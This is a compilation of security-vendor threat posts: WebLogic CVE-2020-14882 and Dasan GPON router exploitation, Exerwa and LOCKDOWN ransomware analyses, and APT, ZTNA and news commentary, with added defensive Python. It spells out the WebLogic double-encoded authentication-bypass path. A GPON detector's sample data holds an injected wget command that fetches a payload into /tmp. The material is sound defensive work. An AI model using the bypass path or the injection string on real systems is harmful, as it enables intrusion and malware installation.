CVE-2020-14882 Oracle WebLogic Remote Code Execution Vulnerability Exploited in the Wild

SonicWall Capture Labs Threat Research team has observed the recent remote code execution vulnerability reported in Oracle WebLogic Server being exploited in the wild. This vulnerability is due to improper sanitization of user-supplied data sent over HTTP.

Oracle WebLogic is one of the most widely used Java application servers. It helps build and deploy distributed web applications for large enterprises.

Vulnerability | CVE-2020-14882

A remote code execution vulnerability exists in Oracle WebLogic Server. The vulnerability is due to improper validation of user-supplied data in the com.bea.console.utils.MBeanUtilsInitSingleFileServlet and com.bea.console.handles.HandleFactory classes.

The vulnerable class com.bea.console.handles.HandleFactory can be triggered using an HTTP request with the following structure:

http://<target>/console/console.portal?_nfpb=true&_pageLabel=HomePage1&handle=<class_name>

MBeanUtilsInitSingleFileServlet neither filters out the directory traversal sequence “..” nor checks whether the user is authenticated. As a consequence, an attacker can request “/console/css/%252E%252E%252Fconsole.portal”, where “%252E%252E%252F” is the double-URL-encoded form of “../”, to bypass authentication, and supply a request parameter whose name contains the word “handle” and whose value is the name of a class that may be used maliciously; that class is then instantiated by the com.bea.console.handles.HandleFactory class.

This exploit allows an unauthenticated attacker to achieve remote code execution on a vulnerable Oracle WebLogic Server by sending a crafted HTTP GET request. Successful exploitation results in the execution of arbitrary code under the security context of the user running WebLogic Server.
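As an added example (not SonicWall's code and not WebLogic code), the following Python shows why a single-pass URL decoder is fooled by the double-encoded path described above, and what an authorization layer that canonicalizes the path first would see instead: it percent-decodes until the path stops changing, normalizes the “..” segment, and flags a request that looked like an unauthenticated /console/css/ asset but resolves elsewhere and carries a handle parameter. The host name and class name in the sample URLs are constructed placeholders.

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

# Added example, not code from the original post: canonicalize a WebLogic console
# request path before making the authentication decision. Sample URLs below are
# constructed; "target.example" and "com.example.SomeClass" are placeholders.

STATIC_PREFIX = "/console/css/"   # served without authentication, per the post
MAX_DECODE_PASSES = 3             # bound the loop; deeper %25 nesting is hostile anyway


def fully_decode(path):
    """Percent-decode repeatedly until the string stops changing.

    Returns (decoded_path, passes_needed). One pass turns %252E into %2E, which
    still looks harmless to a prefix check; the second pass turns it into ".".
    """
    current, passes = path, 0
    while passes < MAX_DECODE_PASSES:
        decoded = unquote(current)
        if decoded == current:
            break
        current, passes = decoded, passes + 1
    return current, passes


def assess_console_request(url):
    """Return what an authorization check should see for a console request."""
    parts = urlsplit(url)
    decoded, passes = fully_decode(parts.path)
    canonical = posixpath.normpath(decoded)   # collapses "." and ".." segments

    # The bypass relies on this mismatch: the raw path starts with the static
    # prefix, but the canonical path leaves it.
    looked_static = parts.path.startswith(STATIC_PREFIX)
    traversal = looked_static and not canonical.startswith(STATIC_PREFIX)

    # Any parameter whose name contains "handle" reaches HandleFactory.
    query = parse_qs(parts.query)
    handle_params = {k: v for k, v in query.items() if "handle" in k.lower()}

    return {
        "canonical_path": canonical,
        "decode_passes": passes,
        "traversal": traversal,
        "handle_params": handle_params,
        # A single-pass decoder would serve this as a css asset; the canonical
        # view says it must go through the normal console login first.
        "flag": traversal and bool(handle_params),
    }


if __name__ == "__main__":
    for sample in (
        "http://target.example/console/css/%252E%252E%252Fconsole.portal"
        "?_nfpb=true&_pageLabel=HomePage1&handle=com.example.SomeClass",
        "http://target.example/console/css/styles.css",
    ):
        print(sample, assess_console_request(sample))
```

The design point is that the authentication decision must be made on the canonical path, never on the raw one: the same function run in a reverse proxy or WAF in front of the console gives an immediate detection rule for this traffic pattern, and the decode-pass count alone is a useful signal, since legitimate clients do not double-encode.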

Exploit Requests

The following exploits are currently being used:

http://x.x.x.x:7001

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 14003 Oracle WebLogic Server Remote Command Execution 3
IPS: 15218 Oracle WebLogic Server Remote Command Execution 2


Exerwa ransomware leaked from CTF hacker event

The SonicWall Capture Labs threat research team has observed reports of Hungarian PC users infected by Exerwa ransomware. It is reported that Exerwa is CTF malware that emerged from a Capture-the-Flag event where hackers are tasked to build functional ransomware in the shortest possible time. Unfortunately, some code from this event has ended up in the wild. The code is very basic and the initial infection vector is via a word document using macros.


Infection Cycle:


Upon opening the Word document the following page is shown:


A .bat script can be seen on the second page:


Once the macro has run, the following files are dropped on to the system:

  • %USERPROFILE%\Exerwa\decode.bat
  • %USERPROFILE%\Exerwa\exec.enc
  • %USERPROFILE%\Exerwa\script.enc
  • %USERPROFILE%\Exerwa\exec.exe
  • %USERPROFILE%\Exerwa\script.ps1


script.enc contains the following encrypted data:


exec.enc contains the following encrypted data:


decode.bat is run. It contains the following commands:


exec.enc is decrypted using the built-in Windows certutil program and exec.exe is created. It is a non-malicious generic XOR encryption tool by Luigi Auriemma:


script.enc is decrypted with certutil and script.ps1 is created. It contains the following PowerShell script:


This script contains a loop to encrypt files within a given directory using the XOR tool. As shown in the script, “.exerwa” is appended to the names of encrypted files.
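Because the script wraps a generic XOR tool rather than a real cipher, recovery is usually possible without paying. The following Python is an added example, not code from the original post and not the XOR tool's author's code; it assumes the tool applies a short key byte by byte, repeating it over the file (repeating-key XOR). Under that assumption the key is simply the XOR of an encrypted file's first bytes with the known magic bytes of its file type, and one recovered key decrypts every file the loop touched. The sample files and the key are constructed.

```python
import os

# Added example, not code from the original post or from the XOR tool's author.
# Assumption: the tool applies a short key byte-by-byte, repeating it over the
# file (repeating-key XOR). Under that assumption the key is the XOR of the
# first bytes of an encrypted file with the known header of its file type, and
# one recovered key decrypts every file the script touched.

ENCRYPTED_SUFFIX = ".exerwa"   # appended by the script, per the post
MIN_VERIFY_BYTES = 2           # header bytes left over to confirm the key repeats

# Well-known magic bytes for a few file types; extend for the victim's data.
KNOWN_HEADERS = {
    ".pdf": b"%PDF-1.",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".docx": b"PK\x03\x04",
}


def xor_bytes(data, key):
    """Repeating-key XOR; the same function encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(ciphertext, known_prefix):
    """Return the shortest repeating key consistent with a known plaintext prefix.

    Returns None when no key short enough to be confirmed by MIN_VERIFY_BYTES
    leftover header bytes fits; a longer key needs a longer known prefix.
    """
    n = len(known_prefix)
    stream = xor_bytes(ciphertext[:n], known_prefix)   # keystream = key repeated
    for key_len in range(1, n - MIN_VERIFY_BYTES + 1):
        candidate = stream[:key_len]
        if all(stream[i] == candidate[i % key_len] for i in range(n)):
            return candidate
    return None


def decrypt_encrypted_file(name, ciphertext):
    """Return (original_name, key, plaintext); key and plaintext are None on failure."""
    if not name.endswith(ENCRYPTED_SUFFIX):
        raise ValueError("not an %s file: %s" % (ENCRYPTED_SUFFIX, name))
    original = name[: -len(ENCRYPTED_SUFFIX)]
    header = KNOWN_HEADERS.get(os.path.splitext(original)[1].lower())
    if header is None:
        return original, None, None
    key = recover_key(ciphertext, header)
    if key is None:
        return original, None, None
    return original, key, xor_bytes(ciphertext, key)


# Constructed sample data: two small files encrypted with a constructed key.
SAMPLE_KEY = b"k3y!"
SAMPLE_FILES = {
    "report.pdf": b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n",
    "notes.docx": b"PK\x03\x04\x14\x00\x06\x00constructed docx body",
}
ENCRYPTED_SAMPLES = {
    name + ENCRYPTED_SUFFIX: xor_bytes(data, SAMPLE_KEY)
    for name, data in SAMPLE_FILES.items()
}


if __name__ == "__main__":
    # The 7-byte PDF header is long enough to recover and confirm a 4-byte key...
    name, key, plain = decrypt_encrypted_file(
        "report.pdf.exerwa", ENCRYPTED_SAMPLES["report.pdf.exerwa"])
    print(name, key, plain == SAMPLE_FILES["report.pdf"])
    # ...the 4-byte docx header is not, but the key from the PDF decrypts it too.
    print(xor_bytes(ENCRYPTED_SAMPLES["notes.docx.exerwa"], key) == SAMPLE_FILES["notes.docx"])
```

In practice you recover the key from the file type with the longest reliable header on the machine, confirm it on a second file of a different type, and only then run the decryption over the whole tree; if the key turns out longer than any known header, a backup copy of any one affected file gives as much known plaintext as you need.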


SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Exerwa.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Defending Against Tomorrow’s APTs

Adapted from SentinelOne

In my previous blog, I discussed the modern state of Advanced Persistent Threat (APT) groups, and in this one I will discuss the APT groups as they move forward.

As we saw this year, the present COVID-19 pandemic has created powerful opportunities for nations to hack and spy on one another. Quite aside from the power of phishing lures related to Coronavirus themes, the race to be first to obtain a vaccine has led to a number of incidents of espionage related to stealing IP from research laboratories. Based on recent evidence, it is likely that we will see further APT campaigns trying to take advantage of the security vulnerabilities brought about by workplace disruption – from office to home and back again – that at present do not seem to have any end in sight, and will certainly extend into 2021 at least.

Aside from pandemic-related matters, 2020 is a year that has seen widespread political, social, economic and climate disruption in the U.S., and to a certain extent in the U.K. and Europe, as well. All these are grist to the mill for cyber threat actors, who will seize on any opportunity to leverage current events to further their campaigns.

Defending the Enterprise in an Era of Cyber Uncertainty

It sounds like a grim picture, but enterprises are far from helpless or alone. Recent sanctions imposed on Iranian hackers by the U.S., proposed EU sanctions against Russian hacking, and joint announcements by officials in countries like U.S. and U.K. (such as a recent statement blaming China, Iran and Russia in attempts to steal COVID-19 vaccine research) signal greater international cooperation that will hopefully help in reducing such destructive activities.

There are a number of initiatives to protect the healthcare industry from cyber threats during COVID-19, as well as partnerships between nations, law enforcement agencies and public-private collaboration efforts that are also being developed to improve enterprise cybersecurity against advanced persistent threat actors.

At an organizational level, the time when it was possible to believe your organization may not be “interesting” to advanced attackers is well and truly behind us. Nation-state actors are hoovering up masses of data related to organizations and individuals simply because they can, and because they never know when it might be useful.

These nation-state actors rely heavily on social engineering to obtain credentials, deliver their payloads via emails (usually hidden within documents or images), and infect endpoints in order to obtain access to data and then exfiltrate it.

Given the diverse and increasing number of threats, companies need to ensure that they conduct full risk assessment, develop a security plan that includes incident response and business continuity contingencies, and deploy trusted technological solutions to ease the burden on staff.

How to Defend Against Them

Despite a mostly remote workforce due to shelter-in-place orders, it is still vital to build a layered defense that starts at the network, moves down to the endpoint and then back up to the cloud. This is the part where I issue you a friendly warning that I will talk about SonicWall solutions.

When I talk about preventative measures, I usually start with the perimeter as traffic is passing into the network. If you’ve listened to my presentations before, I like to first talk about known threats and how SonicWall is identifying and creating definitions for around 140K new threats each business day. These are pushed to SonicWall devices and services to stop known threats, which usually solves around 99% of threats today. But when it comes to APTs and targeted attacks, these definitions may not help. Despite the fact that network firewalls and the storied Next-Generation Firewall have been on the market for some time, these workhorses of security are still doing the lion’s share of protecting networks — first by scrubbing for known threats, and then by utilizing a variety of resources to stop attacks while managing traffic.

This is where additional technology is required to find unknown threats. This is usually a mix of heuristics on endpoints and sandboxes on the network. At SonicWall, we deploy a technology on nearly every service and product we sell called Capture Advanced Threat Prevention (Capture ATP) with Real-Time Deep Memory Inspection (RTDMI). A file first goes through a static check for presence on an allow or block list. If it is on neither, it is sent either to a Capture ATP point of presence (PoP) for examination by the cloud-based sandboxing technology, or to your on-premises Capture Security appliance (CSa) for examination. Capture ATP examines files in parallel in multiple sandbox engines to look for malicious behavior and reports back the results. In February 2018, we added RTDMI to Capture ATP at no additional charge. This technology tests files and code in memory to find results quicker and with more accuracy. Besides our private industry customers, it is this technology that our state, local and federal government customers rely on for safety, particularly against newly minted ransomware attacks.

With phishing the number-one vector in most compromises, phishing awareness training backed by advanced email security that can recognize known and unknown threats is a priority. How we handle classifying the known threats and unknown threats is listed above. It is the work of our Capture Labs team to create static definitions, and the work of Capture ATP to scout for the unknown.

With our work-from-home state of things, endpoint security may be your first and last line of defense. Unless you force your employees to route through the firewall via VPN or a cloud-based SASE solution, such as SonicWall Cloud Access Secure Access, to access the internet on their devices, odds are you will have to rely on endpoint security to keep them safe. SonicWall Capture Client is a lightweight, advanced heuristics-based endpoint security product that watches the system constantly (with around 0.1-0.4% system usage) for malicious behavior, with the intent of stopping attacks before they can execute. If something does cause damage, you can easily roll back the endpoint to its last-known clean state.

Outside of the ability to block attacks whether or not they’ve been previously identified, a large focus recently has been adding the ability to catalog all the applications and vulnerabilities on all protected endpoints. APT attackers tend to focus on the latest exploits, since these should provide them with the largest and softest target to hit. This feature, called Application Vulnerability Intelligence, is vital for our customer base, particularly our enterprise and government customers, to mitigate the effects of a landed attack. Additionally, with its onboard content filtering technology, you can enforce your Web Content policies on the endpoint away from the perimeter, or at least block access to all known malicious sites.

Beyond just listing a few SonicWall solutions in play here in the fight against APT groups, there are more solutions — from secure wireless to advanced reporting and analytics — that are great tools to discover and mitigate potential issues. For more information on these options, either view our website or contact our sales team, who will work with your existing networking and security technology partner or introduce you to one with the experience to meet your needs.

Conclusion

It wasn’t all that long ago that the very existence of APTs was something shrouded in myth and secrecy, but with public disclosures and leaks of APT toolkits now in the public domain, it seems nation-state actors are not nearly so shy or retiring as they once were. Discussion of APT activity is now part of mainstream cyber discourse, with all sides seemingly content to openly acknowledge that cyber warfare between nations is part of the “new normal” that will be with us for some time to come.

Businesses need to understand that in our interconnected world, there is no such thing as being either “invisible” or “uninteresting” to advanced cyber attackers. Know it or not, like it or not, if you’re online storing and processing data, and engaged in any kind of commercial relationships, there’s an APT cyber threat actor out there interested in you, your data, your product, your clients and/or your providers.

While that might sound scary, fortunately APTs and their tactics, techniques and procedures are also no longer shrouded in mystery. APTs are just another threat actor we all have to deal with. We are not alone in this fight, and we are not defenseless, so long as we first recognize the threat and then take appropriate measures.

I invite you to continue reading one of SonicWall’s many solution briefs on a variety of subjects. Let me leave you with a few options that might direct you to something more specialized.

Black Friday Preview: As Holiday Shopping Thrives Online, Will Cybercriminals Move In?

Despite this year’s deluge of emails and commercials already proclaiming, “BLACK FRIDAY IS HERE!” there are still several days until the official start of the holiday shopping season.

The realities of 2020 have seen the traditional doorbuster-type frenzy give way to a more diffuse set of bargains throughout the month (and even as early as October). But in the U.S., the period between Thanksgiving evening and 11:59 p.m. the following Monday is still expected to reign supreme, as shoppers rush to get the year’s best prices on electronics, home goods and appliances.

This year’s holiday shopping season comes amid perhaps the biggest wave of financial uncertainty to hit the U.S. since the recession of the late aughts. Combined with the ongoing COVID-19 pandemic and an unpredictable political climate, it’s little surprise that this year’s holiday shopping revenue is expected to fall short of the $184 billion spent this time last year.

Even so, according to NerdWallet, 201 million Americans, or roughly 8 out of 10, are expected to take part in the holiday shopping season of 2020 and will generate a still very robust $167 billion in sales.

But they won’t be standing in line at the mall to do so. While the shift toward online shopping goes back to at least 2005, when the term “Cyber Monday” was coined by the National Retail Federation, this year will almost certainly accelerate this trend, as people are choosing to avoid crowds for safety, are quarantining or are prohibited by law from doing things like massing in front of retail stores.

According to Digital Commerce 360, during the first 10 days of November, customers already spent $21.7 billion online, a 21% year-over-year increase — and the period from Thanksgiving through Cyber Monday is expected to generate 35-40% more online shopping than last year. Roughly 66% of shoppers say they’ll make more purchases online in 2020, with over 95% of people expected to buy half or more of their gifts online.

But while this might be good to help control the spread of the pandemic, it’s also good for cybercriminals. For the past few years, SonicWall Capture Labs threat researchers have recorded a higher than usual number of attacks taking place over the holiday shopping period. For example, in 2019, between Nov. 25 and Dec. 2, there were 129.3 million malware attacks (a 63% increase over 2018.) In the U.S. specifically, both malware (130%) and ransomware attacks (69%) were up compared to 2018.

What will this year hold? While 2020 continues to defy predictability, there’s already trouble on the horizon. The last quarter for which we have data, Q3 2020, showed some disturbing trends: In September, malware had its biggest rally of the year, increasing by 59 million over August. Worse, the 20% YoY increase in ransomware we saw at the end of Q2 had widened to a 40% increase by the end of Q3, having been on a steady rise since June.

While it might be tempting to think this level of cybercrime would suggest we’re nearing some sort of ceiling and won’t see the sorts of increases over Black Friday weekend that we’ve seen in the past, everything we know about cybercriminals in 2020 refutes that. The cybercriminals we’ve seen at work during the pandemic have been as opportunistic and crafty as any we’ve seen before. And they’ve shown no qualms about targeting those they perceive as vulnerable, whether it’s hospitals, local governments or individual remote workers.

Unfortunately, this means holiday shoppers, more bargain-hungry than ever and doing most or all of their shopping online, could prove tempting quarry indeed — particularly since many people will be using the same devices and networks to shop that they use to connect to their employers’ corporate networks.

Of course, we hope that cybercriminals instead decide to cut us a rare break in a trying year and just watch some football. But no matter what happens, SonicWall’s threat researchers will be watching.

Cybersecurity Alphabet Soup: SDP, ZTNA and SASE

The technology industry is a breeding ground for creating TLAs (Three-Letter Acronyms) and FLAs (Four-Letter Acronyms). So inviting a few more TLAs and FLAs to the party is just business as usual.

In recent years we’ve added SDP and ZTNA, and in 2020 a new term, SASE, has continued picking up momentum.

If you aren’t sure what all these terms mean, here’s a quick refresher:

Software-Defined Perimeter (SDP)

Software-Defined Perimeter (SDP), also called a “Black Cloud,” is an approach to computer security. It evolved from the work done at the Defense Information Systems Agency (DISA) under the Global Information Grid (GIG) Black Core Network initiative around 2007.

Source: https://en.wikipedia.org/wiki/Software_Defined_Perimeter

If you don’t care for technical jargon, just think of SDP as an architecture that separates the control plane from the data plane while connecting users to the network. This separation helps to achieve access control, asset isolation, high availability and scale.

Zero Trust Network Access (ZTNA)

Zero Trust Network Access (ZTNA) is another security architecture in which only traffic from authenticated users, devices and applications is granted access to other users, devices and applications.

Source: https://www.sdxcentral.com/security/definitions/what-is-zero-trust-network-access-ztna/

Do these sound similar to you?

If so, it’s because they do have a lot in common — but since they were initiated by different organizations, they have different terminologies. There are some subtle differences as well. For example, when John Kindervag from Forrester first talked about Zero Trust in the year 2010, he talked about “Zero Trust Network Architecture.” The zero-trust principle, “never trust, always verify,” was envisioned as a way to address the broken traditional trust model.

Today’s ZTNA, Zero Trust Network Access, is a way to achieve Zero Trust for access — in other words, you would still need to inspect the traffic to achieve complete Zero Trust.

SDP, on the other hand, provides a much more prescriptive architecture (see below) that separates the control plane and the data plane.

Source: Cloud Security Alliance

Once this separation is in place, it’s easier to control access to the network based on various parameters such as user, device, time of the day, location, etc. The SDP architecture also mandates granting least-privileged access defined by the granular policies.

So, if you think about ZTNA carefully, you will realize that it actually uses the concept of SDP.

Secure Access Service Edge (SASE)

The term SASE was introduced by Gartner in August 2019, in its “The Future of the Network Security is in the Cloud” research report.

Source: https://www.gartner.com/document/3956841

As defined by Gartner analysts, SASE combines network security functions (such as SWG, CASB, FWaaS and ZTNA) with WAN capabilities (e.g., SD-WAN) to support the dynamic security needs of organizations.

Source: The Future of the Network Security Is in the Cloud

These capabilities are delivered primarily as a service (aaS) and based upon the identity of the entity, real-time context and security/compliance policies.

Does that term SASE feel like an umbrella term, then? If so, that’s because IMO it is.

Today, the biggest challenge for all cybersecurity vendors (SonicWall included) is to demonstrate that they have SDP, ZTNA and SASE solutions so that their customers don’t feel like they are missing out on innovative new trends.

As a result, we have the following types of vendors, which originated in different cybersecurity domains, all trying to pitch their solutions as SDP, ZTNA and SASE.

  1. Cloud-delivered cybersecurity vendors – Recent additions to the ecosystem
  2. IdP vendors – Identity Providers
  3. SD-WAN vendors – Software-defined networking players
  4. New vendors – New companies that get added to the ecosystem (as purists) with every new wave of acronyms
  5. Traditional cybersecurity vendors – Birthright indisputable, right? :)

So, does SonicWall provide SDP, ZTNA or SASE solution(s)?

Hell yes! What kind of question is that?

To learn more about SonicWall’s ZTNA solution, check out our newly launched Cloud Edge Secure Access. You can be up and running in just a few minutes!

LockDown ransomware actively spreading in the wild

The SonicWall Capture Labs Threat Research team observed reports of a new variant family of LOCKDOWN ransomware actively spreading in the wild.

The LOCKDOWN ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\[Name].<LOCKDOWN>
    • %App.path%\[Name].<bondy>
    • %App.path%\[Name].<Connect>
    • %App.path%\[Name].<sext>

Once the computer is compromised, the ransomware runs the following commands: (Actual Source code)

When LOCKDOWN is started it will create and assign a unique ID number to the victim then scan all local drives for data files to encrypt.

When encrypting files it will use the AES encryption algorithm and only encrypt those files that match the following extensions:

The ransomware encrypts all the files and appends the [LOCKDOWN] extension onto each encrypted file’s filename.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.


SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Blackheart.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 11-20-20

This week hackers targeted hardware and software, with attacks on WordPress sites, printers, CPUs and the popular game “Among Us” making headlines.


SonicWall in the News

SonicWall Stresses Zero Trust, Zero Touch in 2020 — ChannelPro Network

  • A look at SonicWall’s business strategy in 2020, particularly SonicWall’s Cloud Edge solution, its Boundless 2020 virtual event, and commentary from Bill Conner and Dmitriy Ayrapetov.

Best Firewalls For Small Businesses — Business Pundit

  • Business Pundit has recognized SonicWall’s TZ firewall as the “Best Overall Firewall.”

SonicWall Refreshes Low Ends of TZ and NSa Firewall Portfolios and Unveils Zero Trust SonicWall Cloud Edge Secure Access — ChannelBuzz

  • SonicWall adds Cloud Edge Secure Access solution and new TZ and NSa firewalls to its lineup.

Firewalls And ZTNA Solution Protect Working Environments — LANline

  • LANline offers a closer look at SonicWall’s new NSFirewalls and ZTNA solution news.

SonicWall Expands Cybersecurity with New TCO Firewalls — APN News

  • SonicWall announced the expansion of its Capture Cloud Platform with the high-performance NSa 2700 firewall, three new cost-effective TZ firewall options and the debut of its SASE offering.

Industry News

The 10 Coolest Cybersecurity Startups Of 2020 — CRN

  • Perimeter 81, who teamed up with SonicWall to create the Cloud Edge Secure Access solution, made CRN’s list of Coolest Cybersecurity Startups of 2020.

Cybersecurity Industry in Detroit Is Growing and Mentors Are Starting With Young People — Detroit Free Press

  • In an article on how Detroit’s cybersecurity industry is growing, Bill Conner offers cybersecurity tips for remote work.

Egregor ransomware bombards victims’ printers with ransom notes — Threatpost

  • The Egregor ransomware uses a novel approach to get a victim’s attention after an attack: it shoots ransom notes from all available printers.

Bitcoin hits nearly three-year peak, homes in on record — Reuters

  • Bitcoin has soared to its highest level since December 2017 as the asset’s perceived quality as a hedge against inflation lured institutional and retail demand.

Trump fires CISA chief Chris Krebs, who guarded the 2020 election from interference and domestic misinformation — Cyberscoop

  • President Donald Trump on Tuesday said he had fired Chris Krebs, a widely respected Department of Homeland Security official who helped protect the 2020 election from hacking and disinformation, the latest in a series of purges.

Forget Imposters. Among Us Is a Playground for Hackers — Wired

  • James Sebree, a researcher for security firm Tenable, on Tuesday published a blog post laying out a slew of relatively simple, hackable vulnerabilities in Among Us.

Hackers are actively probing millions of WordPress sites — Bleeping Computer

  • Unknown threat actors are scanning for WordPress websites with Epsilon Framework themes installed on over 150,000 sites and vulnerable to Function Injection attacks that could lead to full site takeovers.

Ransomware Operator Promotes Distributed Storage for Stolen Data — Dark Reading

  • The criminals behind the DarkSide ransomware-as-a-service operation say the system will be harder to take down.

Hackers can use just-fixed Intel bugs to install malicious firmware on PCs — Ars Technica

  • Vulnerabilities allowed hackers with physical access to override a protection Intel built into modern CPUs that prevents unauthorized firmware from running during the boot process. Known as Boot Guard, the measure is designed to anchor a chain of trust directly into the silicon to ensure that all firmware that loads is digitally signed by the computer manufacturer.

In Case You Missed It

Attackers actively targeting vulnerable Dasan GPON home routers

SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in Dasan GPON home routers. DASAN Zhone Solutions is a provider of network access solutions for service provider and enterprise networks. The company provides a wide array of reliable, cost-effective networking technologies—including broadband access, Ethernet switching, Passive Optical LAN and software-defined networks.

Attackers are targeting the following two vulnerabilities in GPON home routers:

Authentication Bypass Vulnerability
It is possible to bypass authentication simply by appending “?images” to any URL of the device that requires authentication, for example via the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. The attacker can then manage the device. (CVE-2018-10561)

Command Injection Vulnerability
A command injection vulnerability exists in Dasan GPON home routers via the dest_host parameter in a diag_action=ping request to the GponForm/diag_Form URI. The router saves the ping results in the tmp directory and displays them when the user visits diag.html. This can be used to inject and execute commands. (CVE-2018-10562)

The following exploit was spotted in the wild:

The attacker takes advantage of the above vulnerabilities to bypass authentication by appending “?images” to the POST request. Then the attacker downloads a malicious executable by injecting a “wget” command. This is saved in the tmp directory and is executed when a user visits the diag.html page.
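The two request patterns described above, as an added detection example (not SonicWall's signature logic and not the router vendor's code): a small inspector over request records in the shape a proxy or IDS would expose them (method, URI, body), which flags the “?images” suffix on a URI that should require authentication, and a dest_host value in a ping request that contains anything other than a hostname or address. The records and the TEST-NET addresses are constructed; the injected body in the third record mirrors the wget-to-tmp behaviour the post describes.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Added example, not SonicWall's signature logic or the router vendor's code.
# It inspects request records (method, URI, body) as a proxy or IDS would
# expose them and reports the two patterns the post describes. All records
# below are constructed; the addresses are TEST-NET documentation ranges.

AUTH_REQUIRED = ("/menu.html", "/GponForm/")    # URIs the post names; extend as needed
DIAG_FORM = "/GponForm/diag_Form"
HOST_OK = re.compile(r"^[A-Za-z0-9.\-:]+$")     # a hostname or IP address, nothing else


def parse_form(body):
    """Parse application/x-www-form-urlencoded data, splitting on '&' only."""
    params = {}
    for pair in body.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def inspect_request(req):
    """Return a list of findings for one request record (empty when clean)."""
    findings = []
    parts = urlsplit(req["uri"])

    # CVE-2018-10561: "?images" appended to a URI that should require login.
    if parts.query.startswith("images") and parts.path.startswith(AUTH_REQUIRED):
        findings.append("CVE-2018-10561 auth bypass: '?images' appended to authenticated URI")

    # CVE-2018-10562: dest_host in a ping request carrying anything but a host.
    if req["method"] == "POST" and parts.path == DIAG_FORM:
        params = parse_form(req["body"])
        if params.get("diag_action") == ["ping"]:
            for host in params.get("dest_host", []):
                if not HOST_OK.match(host):
                    findings.append("CVE-2018-10562 command injection: dest_host=%r" % host)
    return findings


def scan(requests):
    """Map record index -> findings, for records that produced any."""
    results = {}
    for index, req in enumerate(requests):
        findings = inspect_request(req)
        if findings:
            results[index] = findings
    return results


# Constructed request records (not captured traffic).
SAMPLE_REQUESTS = [
    {"src": "198.51.100.23", "method": "GET", "uri": "/menu.html", "body": ""},
    {"src": "198.51.100.23", "method": "POST", "uri": DIAG_FORM,
     "body": "diag_action=ping&dest_host=192.0.2.1"},
    {"src": "203.0.113.77", "method": "POST", "uri": DIAG_FORM + "?images/",
     "body": "diag_action=ping&dest_host=;wget+http://203.0.113.9/x+-O+/tmp/x;"},
    {"src": "203.0.113.78", "method": "GET", "uri": "/menu.html?images/", "body": ""},
]


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_REQUESTS).items():
        print(SAMPLE_REQUESTS[index]["src"], findings)
```

The allow-list check on dest_host is deliberately stricter than a metacharacter block-list: a diagnostic ping only ever needs a hostname or address, so anything else is worth an alert even if it is not an obvious shell sequence. The same two checks make a sensible rule for a perimeter device in front of these routers, and the bypass check alone catches the authentication stage regardless of which second-stage payload follows.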

SonicWall Capture Labs provides protection against this threat via the following signatures:

    • IPS 13340: Dasan GPON Routers Command Injection
    • GAV: Mirai.H

Threat Graph

IoCs:
59.99.45.126
117.213.46.186
117.194.165.174
112.27.124.174
42.234.109.14
2e4506802aedea2e6d53910dfb296323be6620ac08c4b799a879eace5923a7b6

A quick look at Shodan reveals thousands of vulnerable devices

Making Sense of Today’s APT Groups

Adapted from SentinelOne

In recent months, there has been a marked uptick in nation-state cyber activity. Recently, we’ve learned that Chinese hackers stole information from Spanish centers working on COVID-19 vaccines. The U.S. Justice Department has indicted five Chinese nationals and two Malaysians who targeted over 100 companies, organizations and individuals in 14 countries. Three Iranian nationals have been indicted on charges of hacking U.S. aerospace and satellite companies, and APT39 has been spying on Iranian dissidents. Two additional Iranian hackers were also indicted for defacing multiple websites with pro-Iranian propaganda.

This surge in nation-state hacking activity is not a blip but a discernible trend. Attacks attributed to nation-state backed Advanced Persistent Threat (APT) groups have increased not only in terms of volume but also in scope and sophistication. The problem has been exacerbated because of COVID-19 and its impact on the global economy and international relations.

Concerns about APT groups used to be a niche topic discussed primarily by government security experts and the cybersecurity industry, but now it has reached mainstream awareness, as can be seen by statements from U.S., U.K. and other Western government officials. Most recently, Australian Defense Minister Linda Reynolds made a public statement expressing concerns that malicious cyberattacks against Australian businesses and government agencies from a state-based actor, believed to be China, had increased over the past two months.

In my personal experience with Russian ransomware authors, attacks on German, English and American private, corporate and government targets from the former Soviet Union have and will continue to be a consistent threat. Additionally, the biannual SonicWall Cyber Threat Report always shows clear evidence of these findings, since it gathers real threat data from over 1.1 million sensors located in over 215 countries and territories. What would be interesting to know is if these APT groups also fund themselves with ransomware to supplement their budgets from their government. We’ve seen this with North Korea, but the picture is unclear with Russian, Iranian and Chinese APT groups.

Making Sense of a Chaotic World

Reading all these headlines can be confusing. Who is attacking who, why and how? Let’s try to break down the different nation-state activities in cyberspace.

Sabotage – The virtual can break out into the physical when nations use cyber means to cause damage to computer systems or physical systems of other nations. Attacks on critical infrastructure have increased sharply in the last two years. Among them, a tit-for-tat between Israel and Iran: an Iranian attack on Israel’s water infrastructure led to Israeli retaliation against the port of Shahid Rajaee, a reminder — should anyone have forgotten Stuxnet — that nations are not averse to launching cyberattacks with destructive force on those they perceive as enemies.

Classic Espionage – Good old-fashioned spying is a much more common activity than sabotage. Nations have been spying on each other since forever, but today much of the old ‘spy-craft’ activities are conducted in cyberspace. Data theft is easier, cheaper and relatively risk-free when you’re behind a keyboard hacking into a server in a different country and protected by the laws and security services of your own government.

